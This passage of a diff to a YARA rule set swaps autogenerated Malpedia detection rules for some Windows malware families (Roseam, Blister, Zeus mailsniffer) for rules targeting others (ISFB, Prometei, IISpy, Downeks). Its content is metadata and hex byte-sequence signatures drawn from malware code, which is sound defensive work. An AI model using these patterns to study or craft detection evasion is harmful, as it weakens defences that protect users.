48394608 7529 488b0e 8a11 } + $sequence_7 = { cc 33c0 4c8d1d8fbafeff 884118 0f57c0 } + $sequence_8 = { 33d2 33c9 ffd0 4889842420010000 4885c0 7510 bab9fa0e75 } + $sequence_9 = { 773b 498bc8 e8???????? 488b6c2458 4a8d0ce3 48891f 498bc6 } condition: - 7 of them and filesize <1141760 + 7 of them and filesize <798720 } -rule MALPEDIA_Win_Roseam_Auto : FILE +rule MALPEDIA_Win_Komprogo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "88276476-b18b-5edc-880f-eae459b2a660" + id = "c2da7eb7-9058-5d5c-a1b3-cf7ec20183b8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roseam_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.komprogo_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "3438063035004ab07a2e8d6bda2a389a18e5085289cc780bdf790db5294b5e20" + logic_hash = "9104f7103ef4ffc58ac248efbbf51156333295a0a474355899a4b0ca03e1b39e" score = 75 quality = 75 tags = "FILE" @@ -133901,34 +136554,34 @@ rule MALPEDIA_Win_Roseam_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 895514 eb38 895514 68???????? 68???????? 50 } - $sequence_1 = { 8b8c2490000000 89442408 8d44240c 6a0a } - $sequence_2 = { 8b12 66c745ec0200 8955f0 c745fc20000000 68???????? 50 9c } - $sequence_3 = { f2ae f7d1 49 894dec 8d0489 99 } - $sequence_4 = { 81fbff000000 895de8 0f84e2010000 8b4df8 83f903 } - $sequence_5 = { 57 b914000000 be???????? 8d7d90 f3a5 33d2 a4 } - $sequence_6 = { 58 68???????? ffd6 b91f000000 33c0 } - $sequence_7 = { 5d 58 8d8d58ffffff 8d95f4fcffff 51 } - $sequence_8 = { 83c40c f3ab 66ab aa e8???????? 8985f4fcffff } - $sequence_9 = { 894df0 eb0d 33c9 894dec 894df0 } + $sequence_0 = { 8d8670720300 89861b630000 8d96f0a80300 8996e51d0300 8d8e40490400 } + $sequence_1 = { 8d86a82f0400 89862cb50200 8d86a8700300 89862cd50000 8d86f0380400 898616410200 8d8680720300 } + $sequence_2 = { 51 8d8618cf0300 8bcf e8???????? 83c404 } + $sequence_3 = { 8d96e4970300 899625080100 898633080100 8d96d0700300 8996e5650200 8d96f4380400 899643080100 } + $sequence_4 = { 8d9614790300 899694e70300 8d86242c0400 8986c1210300 8d86e15c0300 898636ca0000 8d86a8ad0300 } + $sequence_5 = { 0f859e000000 85f6 0f8496000000 8b433c 0fb7541814 } + $sequence_6 = { 898e47bd0200 8d8e20e20300 898e4f7e0200 8d9694a30300 899674750300 8d8ea82f0400 898e897e0200 } + $sequence_7 = { ff15???????? 8b95f0fdffff 8902 33db 85f6 7445 8bb5f0fdffff } + $sequence_8 = { 52 ffd7 8b85d0f3ffff 50 ffd7 8b4df8 5f } + $sequence_9 = { 8d86e0930200 8986d4930200 8d8ec1610300 898e14b20300 } condition: - 7 of them and filesize <221184 + 7 of them and filesize <1045504 } -rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE +rule MALPEDIA_Win_Isfb_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4733ffb9-de21-5ee6-bd3e-4039874823ba" + id = "2206addc-4ea1-5ebc-8989-ba5f49383e7b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_mailsniffer_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isfb_auto.yar#L1-L1623" license_url = "N/A" - logic_hash = "43d5df07bea6317ea4eb20e7781c6702e7589e518cedd0ad1502aceef73d3213" + logic_hash = "dcaa8c2fe85dec9e7e215d7d6083b8c053dc5e8814c7849f4addcdf0f2d4a23f" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -133940,34 +136593,214 @@ rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a01 56 e8???????? 83c40c 85c0 7473 807b0e02 } - $sequence_1 = { 53 6880000000 6a03 53 53 68000000c0 8bc6 } - $sequence_2 = { 68???????? ff750c ff15???????? 83c40c 85c0 0f85bc000000 ffd6 } - $sequence_3 = { 0f84e2020000 53 8d4594 50 8d4588 50 c7459401000000 } - $sequence_4 = { 8b4510 0118 ff45d8 837dc800 0f8480000000 ff75f4 } - $sequence_5 = { 33f6 e8???????? 83c40c 84c0 0f843d020000 8b45f4 } - $sequence_6 = { 56 ff75fc e8???????? 83c414 8bf8 8b35???????? ff15???????? } - $sequence_7 = { 0f8c5b010000 40 3b442410 72dd e9???????? 50 } - $sequence_8 = { 74f4 6a08 8d442430 53 } - $sequence_9 = { 2bd1 eb99 55 8bec 83e4f8 81ecfc0e0000 53 } + $sequence_0 = { e8???????? eb02 33c0 3bc7 741b 50 } + $sequence_1 = { 741b 50 33c0 e8???????? 3bc7 } + $sequence_2 = { ff75f0 ff75f4 6822010000 e9???????? ff7508 } + $sequence_3 = { 58 e8???????? 3bc7 7406 50 } + $sequence_4 = { 3bc7 7413 50 6a10 58 e8???????? } + $sequence_5 = { ff35???????? e8???????? 8bf0 3bf3 7443 6aff 68806967ff } + $sequence_6 = { 50 e8???????? 83c40c e8???????? 3bc7 } + $sequence_7 = { 6a64 ff15???????? a1???????? 85c0 7407 83ee64 } + $sequence_8 = { ff35???????? ff15???????? 85c0 a3???????? 7402 ffe0 c20400 } + $sequence_9 = { 5d 5b 59 c20400 8325????????00 6a00 68???????? } + $sequence_10 = { 7406 50 e8???????? 3bdf 7414 } + $sequence_11 = { a1???????? 85c0 751a 68???????? ff35???????? ff15???????? 85c0 } + $sequence_12 = { 3c05 7506 84e4 7704 3ac0 } + $sequence_13 = { c20400 55 8bec 83ec0c a1???????? 8365f800 } + $sequence_14 = { 2b55fc 8b7d10 0155fc 83451004 } + $sequence_15 = { 83e103 740d 51 50 ff7510 e8???????? 83c40c } + $sequence_16 = { 0155fc 83451004 83c004 49 8917 75e9 } + $sequence_17 = { 7417 8b10 2b55fc 8b7d10 } + $sequence_18 = { 3bc3 7512 e8???????? 3bc3 a3???????? } + $sequence_19 = { 895df4 0f84c7000000 56 53 } + $sequence_20 = { b8???????? 7505 b8???????? 53 bb60ea0000 } + $sequence_21 = { 68000f0000 e8???????? 8bd8 85db 895df4 0f84c7000000 } + $sequence_22 = { 837b240c 56 57 8b3b 897c241c 760a 8b4b20 } + $sequence_23 = { 894b34 8b4b24 2b4b28 894c2410 8b4b34 f6c140 } + $sequence_24 = { 58 e8???????? 85c0 740d 8906 83c604 } + $sequence_25 = { 8b442418 894110 836334f9 c7432c01000000 8b4334 } + $sequence_26 = { e8???????? 8b4320 897324 897328 83c40c 8974240c c6401a00 } + $sequence_27 = { 57 33ff 3bdf 7414 } + $sequence_28 = { ff35???????? 0fc8 50 a1???????? } + $sequence_29 = { 8a4604 2404 f6d8 1bc0 } + $sequence_30 = { c6400731 8b74241c 8b1e 6a00 ff37 ff15???????? 2b442414 } + $sequence_31 = { ff15???????? 8b442414 8b4c240c 8907 8b442418 } + $sequence_32 = { 83ec14 8364240400 53 8b5d0c 837b240c 56 } + $sequence_33 = { 2b442414 50 8b07 03442418 50 56 ff5310 } + $sequence_34 = { 837d0800 7408 ff7508 e8???????? 8bc7 5f 5e } + $sequence_35 = { 752f 8b450c 8930 eb33 } + $sequence_36 = { 74a3 33ff eb0b 33ff eb03 } + $sequence_37 = { 6a01 33db 53 ff35???????? e8???????? 8bf0 } + $sequence_38 = { 50 8d4508 50 53 8bc6 } + $sequence_39 = { 8bd1 83c128 4e 7404 3bd0 74e7 3bd0 } + $sequence_40 = { 488bcf c744242860ea0000 4c0f45c8 48895c2420 } + $sequence_41 = { 3bc8 7415 8b5210 3bd0 } + $sequence_42 = { 53 8bc6 e8???????? 85c0 7516 } + $sequence_43 = { 6a0b eb02 6a02 58 } + $sequence_44 = { 85ff 750e 837d0800 7408 } + $sequence_45 = { 488bcf ff15???????? 4c8964dd00 83c301 4885ff 4c8be7 } + $sequence_46 = { 498bcc ff15???????? 33db 66ba2000 } + $sequence_47 = { 415c 5f 5e 5d 5b c3 8b4754 } + $sequence_48 = { 75c4 48892e eb02 33db 488b0d???????? 885e08 } + $sequence_49 = { c21000 55 8bec 83ec14 a1???????? 53 } + $sequence_50 = { 53 b800080000 50 56 ff35???????? } + $sequence_51 = { e8???????? be01000000 8bc6 4883c440 415e } + $sequence_52 = { 33db 66ba2000 498bcc ff15???????? 4885c0 } + $sequence_53 = { e8???????? 85c0 742d ff75fc 6a0d } + $sequence_54 = { 742d ff75fc 6a0d 58 e8???????? 85c0 } + $sequence_55 = { ff15???????? 4885c0 488be8 7453 } + $sequence_56 = { 4c0f45c8 48895c2420 e8???????? 85c0 8bd8 } + $sequence_57 = { 51 50 57 6a01 ff75e0 68???????? e8???????? } + $sequence_58 = { ff15???????? bb01000000 498bcc eb07 83c301 488d4801 66ba2000 } + $sequence_59 = { 8bd5 488bcf bb57000000 e8???????? } + $sequence_60 = { e8???????? 3bc3 740f 8b35???????? 50 83c604 } + $sequence_61 = { a810 ff750c 7535 68???????? ff75f8 } + $sequence_62 = { ff75f8 ffd6 8b4df4 66c7015c00 } + $sequence_63 = { 8945e0 e8???????? 85c0 0f84dc000000 8b45e0 8d4de0 3bc1 } + $sequence_64 = { 33db 53 ff35???????? c745f408000000 ff15???????? 3bc3 8945f8 } + $sequence_65 = { 6641b85c00 33d2 488bcd ff15???????? } + $sequence_66 = { 50 83c604 e8???????? 3bfb } + $sequence_67 = { b90e010000 41b800000100 4889442420 e8???????? e9???????? } + $sequence_68 = { 6a01 e8???????? 85db 7423 8b0d???????? } + $sequence_69 = { 50 e8???????? 3bfb 7414 } + $sequence_70 = { 72c1 eb0c bb7f000000 eb05 bb7e000000 } + $sequence_71 = { 33d2 ff15???????? 488bdf 8bf7 483bdf } + $sequence_72 = { 4883c608 83fd05 72c1 eb0c } + $sequence_73 = { 3bc3 8945f4 741a ff750c 668918 68???????? } + $sequence_74 = { 50 8bd7 e8???????? eb02 33c0 3bc3 7413 } + $sequence_75 = { a840 0f84e2000000 8b7334 8d442418 50 8d442410 50 } + $sequence_76 = { 8b7508 e8???????? 33f6 3975fc } + $sequence_77 = { ff7510 57 ff750c 53 e8???????? 3bfe 740e } + $sequence_78 = { 0f8544010000 8b472c a801 742d ff37 e8???????? 85c0 } + $sequence_79 = { e8???????? 3bfe 740e 57 56 ff35???????? ff15???????? } + $sequence_80 = { ff5214 8bf7 8bfe e8???????? 5f 5e } + $sequence_81 = { 5b 8be5 5d c20800 8b4330 a804 0f8451ffffff } + $sequence_82 = { c744242000010000 ff15???????? 4883f8ff 488bf8 7442 } + $sequence_83 = { ff15???????? 53 56 ff35???????? ff15???????? 5b 5f } + $sequence_84 = { 3975fc 7410 ff75fc 56 ff35???????? ff15???????? 53 } + $sequence_85 = { 83bc248800000000 4c8b442440 488b542448 894c2430 } + $sequence_86 = { 752e 53 e8???????? 6a01 6a01 } + $sequence_87 = { 56 ff35???????? 8945f8 ff15???????? 8bd8 3bde } + $sequence_88 = { e8???????? 85c0 0f85d7000000 8b4604 } + $sequence_89 = { 7505 894720 eb0b 8b4f30 84c9 0f8992000000 } + $sequence_90 = { 83632800 e9???????? 8b4330 a840 0f84e2000000 8b7334 } + $sequence_91 = { 0f854affffff 894330 e9???????? 55 } + $sequence_92 = { c9 c20400 51 56 ff74240c } + $sequence_93 = { 4803df 410fb64101 33d2 488d0cc3 } + $sequence_94 = { 85d2 4d8bf1 458bf8 8bc2 } + $sequence_95 = { e8???????? 8d45fc 50 8b4508 e8???????? } + $sequence_96 = { 50 57 e8???????? e9???????? 68???????? } + $sequence_97 = { ff15???????? 488bcf 48870d???????? 483bcf } + $sequence_98 = { 33db 895d08 eb03 8b5d08 } + $sequence_99 = { 488d0cc3 48890d???????? 410fb64103 488d0cc3 } + $sequence_100 = { ff15???????? 4885db 740c 4c8b0d???????? e9???????? } + $sequence_101 = { c3 418bd8 4803df 410fb64101 } + $sequence_102 = { e8???????? 85c0 7507 33db 895d08 } + $sequence_103 = { 488bce ff15???????? 488b0d???????? 33d2 4c63c0 } + $sequence_104 = { 6a00 ff35???????? ff15???????? 33db 6a01 } + $sequence_105 = { 8a4b1c 488b4558 4c8b4d30 4c8b4510 } + $sequence_106 = { 448be8 418b4310 41394308 410f474308 } + $sequence_107 = { 488d0cc3 48890d???????? 410fb64102 488d0cc3 } + $sequence_108 = { 33d2 ff15???????? 483bc3 4c8be8 } + $sequence_109 = { 33d2 498bcc 498bfd e8???????? 493bc5 7405 } + $sequence_110 = { 5b c3 a1???????? 83c040 50 ff15???????? eb08 } + $sequence_111 = { 8b3d???????? 56 ffd7 53 56 } + $sequence_112 = { e8???????? 0945fc 47 83c304 3b3e 72dc 8b45fc } + $sequence_113 = { c9 c20400 53 56 8bf0 8a06 } + $sequence_114 = { 8bf1 05fefeffff 33db 33c9 } + $sequence_115 = { 8b02 43 8acb d3c0 33c6 33442410 8bf0 } + $sequence_116 = { ff15???????? 8ac3 5b c9 c20400 53 } + $sequence_117 = { 8bf0 8932 83c204 ff4c240c 75e6 5e 5b } + $sequence_118 = { 4533c9 4889442428 215c2420 4533c0 } + $sequence_119 = { 50 8d442430 50 8d442428 50 8d442428 } + $sequence_120 = { 480f45f2 832700 458be0 bb08000000 } + $sequence_121 = { ff15???????? 4c8d4c2450 4c8d442458 8d5001 488bce e8???????? 85c0 } + $sequence_122 = { ff15???????? 4883f8ff 4c8be0 0f8583000000 488b0d???????? 4d8bc5 } + $sequence_123 = { e9???????? 33c9 bb26040000 48870d???????? } + $sequence_124 = { ff15???????? 49bb00c0692ac9000000 488bcf 4c019c24d8010000 ff15???????? 6641b85c00 33d2 } + $sequence_125 = { 83c701 e9???????? 488b8424c8010000 498bcc bb01000000 4c8928 } + $sequence_126 = { ff15???????? 488d542440 488bcd ff15???????? 4883f8ff } + $sequence_127 = { 4c8bc7 33d2 ff15???????? 33ff 4885ff } + $sequence_128 = { 488bd6 ff15???????? eb14 488b0d???????? 4c8bc7 33d2 } + $sequence_129 = { 6a00 ff35???????? ffd3 8bd8 85db 7476 } + $sequence_130 = { 41b905000000 488bd8 ff15???????? 488bcb } + $sequence_131 = { 4c8be8 0f841c010000 448b05???????? 33d2 488bc8 4c33c7 e8???????? } + $sequence_132 = { 7416 a1???????? 83c004 50 be???????? } + $sequence_133 = { 498bcf ff15???????? 448bf0 488bce ff15???????? } + $sequence_134 = { 895df4 895df0 c745f857000000 bf19010000 } + $sequence_135 = { 7520 41390424 741a 498d4c2401 } + $sequence_136 = { 488b0d???????? 448bc0 8bd8 33d2 4983c001 } + $sequence_137 = { a1???????? 25efff0000 0bc2 e9???????? } + $sequence_138 = { 4c63c0 33d2 4983c00c ff15???????? } + $sequence_139 = { 215c2420 4533c9 4533c0 33d2 ff15???????? 85c0 7511 } + $sequence_140 = { 6a03 8935???????? 8935???????? 8935???????? } + $sequence_141 = { e9???????? 488bcb ff15???????? a810 } + $sequence_142 = { 803f2a 750b 4883c701 83c3ff } + $sequence_143 = { 41be01000000 33c9 418bd6 ff15???????? } + $sequence_144 = { 53 56 8bf1 05fefeffff } + $sequence_145 = { 57 4154 4155 4156 4883ec50 488bf1 } + $sequence_146 = { 5e 33c0 c9 c20400 55 8bec 51 } + $sequence_147 = { 4889040f 4883c708 492bf6 75db } + $sequence_148 = { 8bc6 e8???????? 8b06 8b08 57 ff7510 } + $sequence_149 = { 750a 488bcf e8???????? 8bd8 488b0d???????? 4c8bc7 } + $sequence_150 = { 5f c20400 55 8bec 83e4f8 81ec9c000000 } + $sequence_151 = { 488d542438 488bcb e8???????? eb02 } + $sequence_152 = { 8bc7 e8???????? 8d4618 8b08 50 51 } + $sequence_153 = { 6a20 40 50 ffd6 } + $sequence_154 = { 488bd3 ff15???????? 488b8c2428020000 8bf0 ff15???????? } + $sequence_155 = { 7417 4863461c 2b6e1c 4c03e8 488b4610 48894718 } + $sequence_156 = { 21442428 488b8c2428020000 488364242000 448d4803 } + $sequence_157 = { 21b42410020000 eb0d ff15???????? 89842410020000 } + $sequence_158 = { 488bcb ff15???????? 8bc8 ff15???????? 21b42410020000 } + $sequence_159 = { 4885c9 7405 e8???????? 4883c428 c3 488d82204a0000 488982284a0000 } + $sequence_160 = { 418bcd e8???????? 8b842410020000 4c8d9c24f0010000 } + $sequence_161 = { 488b15???????? 4c8d842428020000 48c7c101000080 ff15???????? } + $sequence_162 = { e8???????? 5e 5f c9 c3 51 53 } + $sequence_163 = { 50 57 6a01 ff7508 ffd6 85c0 742b } + $sequence_164 = { 448bcf 4533c0 e8???????? 483bc3 488905???????? 0f84dc000000 } + $sequence_165 = { e8???????? 488b0d???????? 4c8bc3 33d2 ff15???????? 488b0d???????? 4c8bc7 } + $sequence_166 = { 4c8d40cc 33d2 33c9 e8???????? 85c0 0f8561010000 } + $sequence_167 = { 7415 397b44 7510 488b0b e8???????? 85c0 0f859b000000 } + $sequence_168 = { ffc1 807c043000 7531 8bd3 2bd1 8917 } + $sequence_169 = { 84c0 0f89a3000000 8b434c a804 7415 397b44 7510 } + $sequence_170 = { 7505 217b3c eb0b 8b434c 84c0 0f89a3000000 8b434c } + $sequence_171 = { 85c0 0f8561010000 8b4348 a801 742c } + $sequence_172 = { 742c 488b0b e8???????? 85c0 0f85e8000000 488b4608 488b0e } + $sequence_173 = { 85c0 0f859b000000 4863533c 488b4608 } + $sequence_174 = { ba10000000 488bc8 e8???????? 48898424e0010000 4885c0 } + $sequence_175 = { 4c8d442470 488d542440 e8???????? 8bd8 85c0 } + $sequence_176 = { 33d2 468d44385f ff15???????? 4c8bf0 } + $sequence_177 = { 488bf8 4885c0 7427 488d542420 b901020000 ff15???????? 85c0 } + $sequence_178 = { 4c89642448 ff15???????? 8bd8 83f8ff } + $sequence_179 = { 488bc8 458bf9 33ff e8???????? 4c8be8 4885c0 7508 } + $sequence_180 = { 8bd8 85c0 0f85f3010000 4c8b842418020000 8d5808 488d8c24b0000000 4d85c0 } + $sequence_181 = { 448d4256 ff15???????? 4c8be0 4885c0 0f8405010000 ff15???????? } + $sequence_182 = { 90 57 51 8b742420 8b7c241c 8b4c2434 } + $sequence_183 = { 56 57 51 90 8b742428 } + $sequence_184 = { 8b5508 035510 8b3a 83c204 } + $sequence_185 = { 01f2 6683f9ff 896c2428 7508 } + $sequence_186 = { eb67 8044241301 0fb6ca 01cb 30c9 eb59 } + $sequence_187 = { 83c304 894c2410 56 90 } + $sequence_188 = { 5e 01d5 01d3 b101 3b5c2428 0f8266ffffff } + $sequence_189 = { 8b5d10 6601da c1ca03 895510 3010 } condition: - 7 of them and filesize <368640 + 7 of them and filesize <2940928 } -rule MALPEDIA_Win_Blister_Auto : FILE +rule MALPEDIA_Win_Iispy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e15c5b26-46b1-50a6-b793-c24acb88c7d0" + id = "204a2c38-8895-5ac0-a1fb-2cdf3f008fea" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blister_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.iispy_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "2e7268df1a1003febf7615ed82849d5ba6785115864de7e2d3f4d8bf888a50fc" - score = 60 - quality = 25 + logic_hash = "7326802c4105c66879b54e4bc2a70df2a9f75047a51ff2245fe60a57fbe51d36" + score = 75 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -133979,32 +136812,32 @@ rule MALPEDIA_Win_Blister_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33f6 8d4447fe 8975fc 8945f8 3bfe 0f8447010000 } - $sequence_1 = { 57 ff75fc ffd6 85c0 7529 33c9 41 } - $sequence_2 = { e8???????? 8bf0 85f6 7c2e 6a04 58 8d4d08 } - $sequence_3 = { 8bff 55 8bec b8dc140000 e8???????? a1???????? 33c5 } - $sequence_4 = { 8b3d???????? 6870010000 684c040000 ff7604 ffd7 8b1d???????? } - $sequence_5 = { 8d45a0 50 ff750c c745a060000000 6891100000 ff36 } - $sequence_6 = { ff7604 ff75f4 ff75e8 6a02 ff75fc ff15???????? 85c0 } - $sequence_7 = { 8b4e28 8d45f8 50 895df8 e8???????? } - $sequence_8 = { ff15???????? 8bc8 0fb701 f7d8 1bc0 23c1 5e } - $sequence_9 = { 50 8b859cf7ffff 8b8c052cf7ffff e8???????? 8985a8f7ffff 85c0 0f8cf9010000 } + $sequence_0 = { ebdc 837b1800 0f85f6000000 3bce 7436 8a01 3c5d } + $sequence_1 = { d1e8 03d0 8b5e0c 8b7d08 2bd9 03fb } + $sequence_2 = { 85c0 755e f7459c00100000 7503 8b7608 } + $sequence_3 = { ff2485887a0010 51 8bcf e8???????? 8b17 8b4210 2b420c } + $sequence_4 = { 6a00 ff75e4 c745e800000000 ffd6 85c0 0f856effffff eb0c } + $sequence_5 = { 85f6 0f84c1010000 0fb7460e 8bc8 c1e90a f6c101 } + $sequence_6 = { 0f1145c8 8b4810 894dc4 b903000000 0f1100 6689480e 8d4dc8 } + $sequence_7 = { 8955b4 8d0409 50 6a00 52 e8???????? b800100000 } + $sequence_8 = { f6430801 7411 8d5304 8bcf e8???????? 5f 5e } + $sequence_9 = { 8b742424 8b7c2420 884c240b 89742410 897c241c e9???????? 3bf8 } condition: - 7 of them and filesize <1822720 + 7 of them and filesize <397312 } -rule MALPEDIA_Win_Lookback_Auto : FILE +rule MALPEDIA_Win_Prometei_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5641bb4f-38a9-52e1-a4b7-204dc4620521" + id = "f30d42cb-2af1-5154-8e15-89c897952439" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lookback_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prometei_auto.yar#L1-L159" license_url = "N/A" - logic_hash = "68449af30b767d5c82dfe8271f4bbe8c83972fe98d28065e60e3bffd1a6dc166" + logic_hash = "5377a5e6947b9cd903f94c70f6185011aeea6f018af2aa2974c11199d44376b8" score = 75 quality = 75 tags = "FILE" @@ -134018,32 +136851,38 @@ rule MALPEDIA_Win_Lookback_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 8944241a 57 66894c2416 89442422 8bfa } - $sequence_1 = { 8b7c241c 33ed 8b473c 8b443878 03c7 8b5024 } - $sequence_2 = { 55 8bec 51 53 c745fc00000000 b801000000 } - $sequence_3 = { c3 5e 5d 33c0 5b 81c410070000 c3 } - $sequence_4 = { 3c01 893d???????? 893d???????? 752e } - $sequence_5 = { c644240800 88442415 e8???????? 8d4c240c 89442408 51 } - $sequence_6 = { 8d5108 d1e8 85c0 7e33 } - $sequence_7 = { 74a7 8b06 85c0 757b } - $sequence_8 = { 52 8d442418 57 50 68???????? 57 57 } - $sequence_9 = { 55 8bec 51 53 c745fc00000000 b801000000 0fa2 } + $sequence_0 = { 011d???????? 03c8 8b5de4 a1???????? } + $sequence_1 = { 8bf0 83feff 7425 6a00 8d45d8 50 } + $sequence_2 = { 014364 8b45e4 014368 5b } + $sequence_3 = { bb8c132400 4a af e8???????? 1401 d000 } + $sequence_4 = { 014358 8b45f0 01435c 8b45fc } + $sequence_5 = { 014368 81434400020000 c7434000000000 83534800 } + $sequence_6 = { 8ac2 0245f0 3001 85d2 } + $sequence_7 = { 014360 8b45f4 014364 8b45e4 } + $sequence_8 = { 8b55f0 33c9 8b75fc 8b45f8 85c0 } + $sequence_9 = { 01c8 93 9e b2e0 e605 78a1 a4 } + $sequence_10 = { 013d???????? 8b04b5c8054400 0500080000 3bc8 } + $sequence_11 = { 01435c 8b45fc 014360 8b45f4 } + $sequence_12 = { 014354 8b45e8 014358 8b45f0 } + $sequence_13 = { b901000000 89500c 8bc1 f745c000020000 } + $sequence_14 = { 8b3d???????? b801000000 33c9 53 0fa2 5b } + $sequence_15 = { 8bc1 2bc7 2bd7 0145fc 81c232240000 8bc1 8955e8 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <51014656 } -rule MALPEDIA_Win_Manitsme_Auto : FILE +rule MALPEDIA_Win_Downeks_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e6602fda-fe01-560f-b18c-c680ffd15493" + id = "45e36078-208a-5456-a83d-718f8ea60024" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.manitsme_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.downeks_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "d15a6ee2f4daf2c5f96b25b50dc747d6c2f7c5b49f115484153e22e9303b3c0c" + logic_hash = "f8eb51f40370e6583f97bf6d6b06a56caeeec4252d81205dee3da42852ee5b8c" score = 75 quality = 75 tags = "FILE" @@ -134057,34 +136896,34 @@ rule MALPEDIA_Win_Manitsme_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4c2438 33cc e8???????? 83c440 c3 6a0b 68???????? } - $sequence_1 = { 894c243c 894c2440 2bd0 8a08 880c02 83c001 84c9 } - $sequence_2 = { 6a00 6804040000 68???????? 57 } - $sequence_3 = { 83c408 eb09 57 e8???????? 83c404 8b15???????? 52 } - $sequence_4 = { 8b35???????? 57 8b3d???????? 8da42400000000 8d442428 50 } - $sequence_5 = { 8d442418 50 68fc030000 8d4c2424 } - $sequence_6 = { 897c2420 ff15???????? 8b0d???????? 51 ff15???????? 6a02 } - $sequence_7 = { 53 ff15???????? 68???????? 8d442418 50 c744241c401b0110 e8???????? } - $sequence_8 = { 897c2420 c744241c01000000 ff15???????? 83f8ff 7434 8d4c2408 } - $sequence_9 = { 8975e4 33c0 39b858340110 7467 ff45e4 } + $sequence_0 = { e9???????? 8b8ddcfeffff 51 ff15???????? 8b8de0feffff 53 } + $sequence_1 = { c3 8b4108 c3 b8ccd00904 c3 8bff 55 } + $sequence_2 = { 8d4da0 e8???????? 8b4704 85c0 7409 83f8ff 7304 } + $sequence_3 = { e8???????? 8bd8 83c40c 85db 0f85cf000000 8b55c0 85d2 } + $sequence_4 = { 2bce 51 8bce 2b4d80 8d75a8 8d558c e8???????? } + $sequence_5 = { e9???????? 8d75b4 e9???????? 8d75d0 e9???????? 8bb560ffffff e9???????? } + $sequence_6 = { c785e8faffff07000000 89b5e4faffff 668995d4faffff e8???????? 8975fc 80fb5c 740a } + $sequence_7 = { c1ea08 0fb6d2 8b3c95a0c20804 0fb6d0 8b1495a0c60804 c1e808 0fb6c0 } + $sequence_8 = { ff15???????? 8bf0 83c42c 85f6 0f8547feffff 8b45f0 50 } + $sequence_9 = { 7488 8b4d0c 833900 7502 8901 8b4d10 8b13 } condition: - 7 of them and filesize <212992 + 7 of them and filesize <1318912 } -rule MALPEDIA_Win_Karius_Auto : FILE +rule MALPEDIA_Win_Cuegoe_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ed0a7186-5551-553c-ac59-b131d3af72d8" + id = "eccb0436-f9ed-5e03-8d27-4464cf8de9a1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.karius_auto.yar#L1-L249" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cuegoe_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "b146425f067402ca1aeb5e04aa4caed2d124eb5c4ba40f66c5f112d8e9115a94" + logic_hash = "9bdbb34dedb6d213b915fa268b74e0986ed09811af8e7637c05b65b2310f3a18" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = 